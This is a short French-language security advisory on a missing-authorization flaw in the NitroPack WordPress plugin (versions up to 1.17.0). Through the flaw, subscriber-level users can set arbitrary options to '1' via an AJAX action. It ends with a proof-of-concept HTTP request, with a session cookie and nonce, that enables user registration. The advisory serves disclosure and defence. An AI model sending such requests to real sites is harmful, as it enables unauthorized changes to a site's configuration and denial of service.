
NitroPack <= 1.17.0 - Absence d'autorisation permettant aux utilisateurs authentifiés (Subscriber+) une mise à jour limitée des options
NitroPack <= 1.17.0 - Autorisation manquante pour la mise à jour limitée d'options (Abonné+ authentifié)
Le plugin NitroPack pour WordPress est vulnérable à une modification non autorisée des données en raison d'un manque de vérification des capacités sur l'action AJAX 'nitropack_dismiss_notice_forever' dans toutes les versions jusqu'à 1.17.0 inclus. Cela permet à des attaquants authentifiés, ayant au moins un accès de niveau abonné, de mettre à jour des options arbitraires avec une valeur fixe de '1', ce qui peut activer certaines options (par exemple, activer l'inscription des utilisateurs) ou modifier certaines options d'une manière qui entraîne une condition de déni de service.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=subscriber%7C1737110766%7CYhdLxJv5qLyqmSVznKzPOC94NyU9PAMWPeef9cCtINN%7C8c6d11f15397dfb790e700f695c7480bb8267c86130c402afce6080076ccff2d
Content-Length: 88
action=nitropack_dismiss_notice_forever&security=92f60ea3ea¬ice_id=users_can_register